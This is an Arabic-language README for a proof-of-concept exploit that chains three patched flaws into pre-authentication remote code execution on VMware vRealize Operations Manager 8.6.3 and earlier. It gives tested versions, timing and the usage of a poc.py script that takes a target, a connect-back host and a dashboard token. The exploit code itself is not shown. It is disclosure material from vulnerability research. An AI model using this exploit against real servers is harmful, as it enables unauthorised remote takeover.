
هذا استغلال RCE قبل المصادقة لبرنامج VMware vRealize Operations Manager
هذا استغلال لتنفيذ الأوامر عن بُعد (RCE) قبل المصادقة لبرنامج VMware vRealize Operations Manager (vROPS) ويؤثر على الإصدارات <= 8.6.3.19682901.
Steven Seeley من Qihoo 360 Vulnerability Research Institute
تم اختبار الاستغلال ضد إصدار 8.6.3.19682901 باستخدام الملف vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) لكن من المعروف أنه يعمل ضد الإصدارات الأقدم الأخرى أيضًا.
يدمج هذا الاستغلال ثلاث ثغرات تم إصلاحها. يمكن العثور على مزيد من التفاصيل في منشور المدونة:
سيتطلب هذا الاستغلال من المهاجم توفير:
APUAT-8.5.0.18176777.pak.هناك الكثير من الأجزاء المتحركة في هذا الاستغلال، وآمل أنني صممته بشكل صحيح ليعمل من المحاولة الأولى.
يستغرق الاستغلال في المتوسط حوالي 1m34.142s لاكتماله (تم اختباره 5 مرات)، حاولت تصميمه ليكون أسرع، لكنه ضمن الوقت المخصص لمنافسة ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
